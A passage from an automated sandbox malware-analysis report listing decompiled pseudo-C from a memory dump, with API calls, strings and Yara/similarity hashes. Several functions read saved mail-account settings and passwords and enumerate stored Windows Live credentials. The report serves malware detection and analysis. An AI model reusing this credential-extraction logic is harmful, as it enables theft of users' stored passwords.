				char* _t53;
				void* _t60;
				void* _t65;
				char* _t70;

				_v8 = _v8 & 0x00000000;
				_t65 = __eax;
				 *((intOrPtr*)(__eax + 0x8c)) = 3;
				 *((intOrPtr*)(__eax + 0x210)) = 1;
				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
				if(_v524 == 0x31) {
					 *((intOrPtr*)(_t65 + 0x210)) = 2;
				}
				_v12 = _t65 + 0x110;
				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
				_t70 = _t65 + 0x214;
				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
				if(_v268 != 0) {
					_v188 = 0;
					E00401D5A( &_v268, _t65 + 0x294);
					if( *_t70 == 0) {
						_push(_a8);
						_t60 = 0x7f;
						_push(_t60);
						_push(_t70);
						_push("PopAccount");
						_push(_a4);
						E0040311F();
						if( *_t70 != 0) {
							_t53 = strchr(_t70, 0x40);
							_a8 = _t53;
							if(_t53 != 0) {
								E004060D0(_t60, _v12,  &(_t53[1]));
								 *_a8 = 0;
							}
						}
					}
					_v8 = 1;
				}
				if( *_t70 != 0) {
					_v8 = 1;
				}
				return _v8;
			}














                                                                                              0x00403156
                                                                                              0x00403160
                                                                                              0x00403177
                                                                                              0x00403181
                                                                                              0x0040318b
                                                                                              0x00403197
                                                                                              0x00403199
                                                                                              0x00403199
                                                                                              0x004031b7
                                                                                              0x004031ba
                                                                                              0x004031c2
                                                                                              0x004031d3
                                                                                              0x004031e9
                                                                                              0x00403202
                                                                                              0x0040321a
                                                                                              0x00403226
                                                                                              0x00403234
                                                                                              0x0040323b
                                                                                              0x00403243
                                                                                              0x00403245
                                                                                              0x0040324a
                                                                                              0x0040324b
                                                                                              0x0040324c
                                                                                              0x0040324d
                                                                                              0x00403252
                                                                                              0x00403255
                                                                                              0x0040325d
                                                                                              0x00403262
                                                                                              0x0040326b
                                                                                              0x0040326e
                                                                                              0x00403275
                                                                                              0x0040327e
                                                                                              0x0040327e
                                                                                              0x0040326e
                                                                                              0x0040325d
                                                                                              0x00403281
                                                                                              0x00403281
                                                                                              0x0040328e
                                                                                              0x00403290
                                                                                              0x00403290
                                                                                              0x0040329b

                                                                                              APIs
                                                                                                • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                                                              • strchr.MSVCRT ref: 00403262
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringstrchr
                                                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                              • API String ID: 1348940319-1729847305
                                                                                              • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                              • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                                                              • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                              • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F09D, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 16%
                                                                                              			E0040F09D(char* __eax, void* __ecx) {
				void* _t2;
				char* _t3;
				void* _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t6 = __ecx;
				_t5 = 4;
				while(1) {
					_t2 =  *_t3;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t5);
					_push("&lt;");
					L14:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + _t5;
					L16:
					if( *_t3 != 0) {
						_t3 = _t3 + 1;
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if(_t2 != 0xb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t6 = _t2;
										_t6 = _t6 + 1;
									} else {
										_push(_t5);
										_push("<br>");
										goto L14;
									}
								} else {
									_push(5);
									_push("&amp;");
									goto L11;
								}
							} else {
								_push(5);
								_push("&deg;");
								L11:
								_t2 = memcpy(_t6, ??, ??);
								_t7 = _t7 + 0xc;
								_t6 = _t6 + 5;
							}
						} else {
							_t2 = memcpy(_t6, "&quot;", 6);
							_t7 = _t7 + 0xc;
							_t6 = _t6 + 6;
						}
					} else {
						_push(_t5);
						_push("&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                              0x0040f0a2
                                                                                              0x0040f0a4
                                                                                              0x0040f0a6
                                                                                              0x0040f0a7
                                                                                              0x0040f0a7
                                                                                              0x0040f0ab
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f0ad
                                                                                              0x0040f0ae
                                                                                              0x0040f10a
                                                                                              0x0040f10b
                                                                                              0x0040f110
                                                                                              0x0040f113
                                                                                              0x0040f11a
                                                                                              0x0040f11d
                                                                                              0x0040f11f
                                                                                              0x00000000
                                                                                              0x0040f11f
                                                                                              0x0040f125
                                                                                              0x0040f0b5
                                                                                              0x0040f0b7
                                                                                              0x0040f0c3
                                                                                              0x0040f0dc
                                                                                              0x0040f0e9
                                                                                              0x0040f102
                                                                                              0x0040f117
                                                                                              0x0040f119
                                                                                              0x0040f104
                                                                                              0x0040f104
                                                                                              0x0040f105
                                                                                              0x00000000
                                                                                              0x0040f105
                                                                                              0x0040f0eb
                                                                                              0x0040f0eb
                                                                                              0x0040f0ed
                                                                                              0x00000000
                                                                                              0x0040f0ed
                                                                                              0x0040f0de
                                                                                              0x0040f0de
                                                                                              0x0040f0e0
                                                                                              0x0040f0f2
                                                                                              0x0040f0f3
                                                                                              0x0040f0f8
                                                                                              0x0040f0fb
                                                                                              0x0040f0fb
                                                                                              0x0040f0c5
                                                                                              0x0040f0cd
                                                                                              0x0040f0d2
                                                                                              0x0040f0d5
                                                                                              0x0040f0d5
                                                                                              0x0040f0b9
                                                                                              0x0040f0b9
                                                                                              0x0040f0ba
                                                                                              0x00000000
                                                                                              0x0040f0ba
                                                                                              0x00000000
                                                                                              0x0040f0b7

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                              • API String ID: 3510742995-3273207271
                                                                                              • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                              • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                                                              • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                              • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D865, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 69%
                                                                                              			E0040D865(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406278();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404647( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046C2( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L00411612();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											_t69 = _a4;
											_t44 = _t69 + 8;
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}






























                                                                                              0x0040d86b
                                                                                              0x0040d86e
                                                                                              0x0040d878
                                                                                              0x0040d879
                                                                                              0x0040d87c
                                                                                              0x0040d87f
                                                                                              0x0040d881
                                                                                              0x0040d886
                                                                                              0x0040d88a
                                                                                              0x0040d88c
                                                                                              0x0040d88c
                                                                                              0x0040d895
                                                                                              0x0040d899
                                                                                              0x0040d8a4
                                                                                              0x0040d9e7
                                                                                              0x0040d9f6
                                                                                              0x0040d9f6
                                                                                              0x0040d8ae
                                                                                              0x0040d8b2
                                                                                              0x0040d8b6
                                                                                              0x0040d8ca
                                                                                              0x0040d8ca
                                                                                              0x0040d8b8
                                                                                              0x0040d8c4
                                                                                              0x0040d8c4
                                                                                              0x0040d8ce
                                                                                              0x00000000
                                                                                              0x0040d8d4
                                                                                              0x0040d8d4
                                                                                              0x0040d8da
                                                                                              0x0040d8de
                                                                                              0x0040d9df
                                                                                              0x0040d9e3
                                                                                              0x00000000
                                                                                              0x0040d8e4
                                                                                              0x0040d8e9
                                                                                              0x0040d8ed
                                                                                              0x0040d8f4
                                                                                              0x0040d913
                                                                                              0x0040d917
                                                                                              0x0040d91c
                                                                                              0x0040d936
                                                                                              0x0040d93c
                                                                                              0x0040d93e
                                                                                              0x0040d942
                                                                                              0x0040d947
                                                                                              0x0040d948
                                                                                              0x0040d94d
                                                                                              0x0040d952
                                                                                              0x0040d964
                                                                                              0x0040d96d
                                                                                              0x0040d974
                                                                                              0x0040d97a
                                                                                              0x0040d97f
                                                                                              0x0040d994
                                                                                              0x0040d99f
                                                                                              0x0040d99f
                                                                                              0x0040d9ad
                                                                                              0x0040d9c6
                                                                                              0x0040d9c9
                                                                                              0x0040d9c9
                                                                                              0x0040d9c9
                                                                                              0x0040d9af
                                                                                              0x0040d9af
                                                                                              0x0040d9be
                                                                                              0x0040d9c1
                                                                                              0x0040d9c1
                                                                                              0x0040d9ad
                                                                                              0x0040d952
                                                                                              0x0040d936
                                                                                              0x0040d9d0
                                                                                              0x0040d9d5
                                                                                              0x0040d9d5
                                                                                              0x00000000
                                                                                              0x0040d8e9
                                                                                              0x0040d8de

                                                                                              APIs
                                                                                                • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                              • memset.MSVCRT ref: 0040D917
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                                                              • _strnicmp.MSVCRT ref: 0040D948
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                                                              • API String ID: 945165440-3589380929
                                                                                              • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                              • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                                                              • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                              • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407FEB, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v259;
				char _v260;
				void _v4359;
				char _v4360;
				int _t17;
				CHAR* _t26;

				E004118A0(0x1104, __ecx);
				_v4360 = 0;
				memset( &_v4359, 0, 0x1000);
				_t17 = GetDlgCtrlID(_a4);
				_t35 = _t17;
				GetWindowTextA(_a4,  &_v4360, 0x1000);
				if(_t17 > 0 && _v4360 != 0) {
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					GetClassNameA(_a4,  &_v260, 0xff);
					_t26 =  &_v260;
					_push("sysdatetimepick32");
					_push(_t26);
					L004115B2();
					if(_t26 != 0) {
						E00407EC3(_t35,  &_v4360);
					}
				}
				return 1;
			}









                                                                                              0x00407ff3
                                                                                              0x0040800b
                                                                                              0x00408011
                                                                                              0x0040801c
                                                                                              0x00408022
                                                                                              0x0040802f
                                                                                              0x00408037
                                                                                              0x0040804f
                                                                                              0x00408055
                                                                                              0x00408068
                                                                                              0x0040806e
                                                                                              0x00408074
                                                                                              0x00408079
                                                                                              0x0040807a
                                                                                              0x00408083
                                                                                              0x0040808d
                                                                                              0x00408093
                                                                                              0x00408083
                                                                                              0x0040809b

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00408011
                                                                                              • GetDlgCtrlID.USER32 ref: 0040801C
                                                                                              • GetWindowTextA.USER32 ref: 0040802F
                                                                                              • memset.MSVCRT ref: 00408055
                                                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 00408068
                                                                                              • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
                                                                                                • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                                                              • String ID: sysdatetimepick32
                                                                                              • API String ID: 896699463-4169760276
                                                                                              • Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                              • Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
                                                                                              • Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                              • Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405715, Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				void* __esi;
				void* _t74;
				void* _t75;
				signed int _t76;
				signed int _t89;
				signed int _t90;
				void* _t98;
				void* _t101;
				short* _t118;
				unsigned int _t126;
				intOrPtr _t128;
				signed int _t131;
				void* _t144;
				intOrPtr* _t146;
				short _t153;
				signed int _t155;

				_t129 = __ecx;
				_push(__ecx);
				_t74 = _a4 - 0x4e;
				_t155 = __ecx;
				if(_t74 == 0) {
					_t146 = _a12;
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
						L27:
						_t75 = 0;
						__eflags = 0;
						goto L28;
					} else {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
							goto L27;
						}
						_t76 =  *(_t146 + 0x14);
						__eflags = _t76 & 0x00000002;
						if((_t76 & 0x00000002) == 0) {
							L36:
							_t131 =  *(_t146 + 0x18) ^ _t76;
							__eflags = 0x0000f000 & _t131;
							if((0x0000f000 & _t131) == 0) {
								L39:
								__eflags =  *(_t146 + 0x14) & 0x00000002;
								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0x18) & 0x00000002;
								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0xc);
								E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t155 + 0x14)) = 1;
								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t155 + 0x14)) = 0;
								_t75 = 1;
								L28:
								return _t75;
							}
							L37:
							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
							__eflags = _t89 & 0x00000002;
							if((_t89 & 0x00000002) != 0) {
								_t90 = _t89 & 0x0000f000;
								__eflags = _t90 - 0x1000;
								_v8 = _t90;
								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
								_v16 - 0x2000 = _v16 == 0x2000;
								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t146 + 0x18) & 0x00000002;
						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t98 = _t74 - 0xc2;
				if(_t98 == 0) {
					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
					E0040559F(_t155);
					goto L27;
				}
				_t101 = _t98 - 1;
				if(_t101 != 0) {
					goto L27;
				}
				_t126 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
					L7:
					if(_t126 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
						}
						if(_a8 == 0x3ec) {
							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
						}
						if(_a8 == 0x3ee) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t155 + 4), 2);
						}
						if(_a8 == 1) {
							E00405538(_t155);
							EndDialog( *(_t155 + 4), 1);
						}
						_t75 = 1;
						goto L28;
					}
					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
					_t129 = 0;
					if(_t128 <= 0) {
						L12:
						E0040559F(_t155);
						goto L13;
					}
					_t144 = 0;
					do {
						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
						 *(_t118 + 2) = _t129;
						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
						_t129 = _t129 + 1;
						_t144 = _t144 + 0x14;
						 *_t118 = _t153;
					} while (_t129 < _t128);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004054C6(__ecx, __ecx);
						goto L7;
					}
				}
			}





















                                                                                              0x00405715
                                                                                              0x0040571b
                                                                                              0x0040571f
                                                                                              0x00405725
                                                                                              0x00405727
                                                                                              0x0040585b
                                                                                              0x0040585e
                                                                                              0x00405867
                                                                                              0x00405869
                                                                                              0x0040586c
                                                                                              0x00405873
                                                                                              0x00405879
                                                                                              0x0040586c
                                                                                              0x0040587a
                                                                                              0x0040587e
                                                                                              0x00405850
                                                                                              0x00405850
                                                                                              0x00405850
                                                                                              0x00000000
                                                                                              0x00405880
                                                                                              0x00405880
                                                                                              0x00405883
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405885
                                                                                              0x00405888
                                                                                              0x0040588f
                                                                                              0x00405897
                                                                                              0x0040589a
                                                                                              0x0040589c
                                                                                              0x0040589e
                                                                                              0x004058ed
                                                                                              0x004058ed
                                                                                              0x004058f1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004058f7
                                                                                              0x004058fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405905
                                                                                              0x00405913
                                                                                              0x00405921
                                                                                              0x0040592f
                                                                                              0x0040594d
                                                                                              0x00405950
                                                                                              0x00405956
                                                                                              0x00405959
                                                                                              0x00405852
                                                                                              0x00405858
                                                                                              0x00405858
                                                                                              0x004058a0
                                                                                              0x004058aa
                                                                                              0x004058b2
                                                                                              0x004058b4
                                                                                              0x004058b6
                                                                                              0x004058ba
                                                                                              0x004058c2
                                                                                              0x004058ce
                                                                                              0x004058dd
                                                                                              0x004058e8
                                                                                              0x004058e8
                                                                                              0x00000000
                                                                                              0x004058b4
                                                                                              0x00405891
                                                                                              0x00405895
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405895
                                                                                              0x0040587e
                                                                                              0x0040572d
                                                                                              0x00405732
                                                                                              0x00405844
                                                                                              0x0040584b
                                                                                              0x00000000
                                                                                              0x0040584b
                                                                                              0x00405738
                                                                                              0x00405739
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405742
                                                                                              0x00405748
                                                                                              0x00405762
                                                                                              0x00405765
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405771
                                                                                              0x004057a6
                                                                                              0x004057b7
                                                                                              0x004057bf
                                                                                              0x004057bf
                                                                                              0x004057ca
                                                                                              0x004057d2
                                                                                              0x004057d2
                                                                                              0x004057dd
                                                                                              0x004057e8
                                                                                              0x004057ee
                                                                                              0x004057f5
                                                                                              0x00405800
                                                                                              0x00405806
                                                                                              0x00405812
                                                                                              0x00405819
                                                                                              0x00405819
                                                                                              0x00405820
                                                                                              0x00405822
                                                                                              0x0040582c
                                                                                              0x0040582c
                                                                                              0x00405830
                                                                                              0x00000000
                                                                                              0x00405830
                                                                                              0x00405776
                                                                                              0x00405779
                                                                                              0x0040577d
                                                                                              0x004057a0
                                                                                              0x004057a1
                                                                                              0x00000000
                                                                                              0x004057a1
                                                                                              0x0040577f
                                                                                              0x00405781
                                                                                              0x00405786
                                                                                              0x00405789
                                                                                              0x00405790
                                                                                              0x00405795
                                                                                              0x00405796
                                                                                              0x0040579b
                                                                                              0x0040579b
                                                                                              0x00000000
                                                                                              0x00405751
                                                                                              0x00405757
                                                                                              0x00000000
                                                                                              0x0040575d
                                                                                              0x0040575d
                                                                                              0x00000000
                                                                                              0x0040575d
                                                                                              0x00405757

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 004057BD
                                                                                              • GetDlgItem.USER32 ref: 004057D0
                                                                                              • GetDlgItem.USER32 ref: 004057E5
                                                                                              • GetDlgItem.USER32 ref: 004057FD
                                                                                              • EndDialog.USER32(?,00000002), ref: 00405819
                                                                                              • EndDialog.USER32(?,00000001), ref: 0040582C
                                                                                                • Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
                                                                                                • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                                                                • Part of subcall function 004054C6: SendMessageA.USER32 ref: 00405505
                                                                                              • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Item$DialogMessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2485852401-0
                                                                                              • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                              • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                                                              • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                              • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405960, Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L004115D0();
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L004115D6();
					 *_t82 = 0;
				}
				_t82[2] = _a8;
				_t41 = E004049FB(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L004115D0();
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					_t86 = ( *(_t80 + 0xc))[1];
					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);
					L004115D0();
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
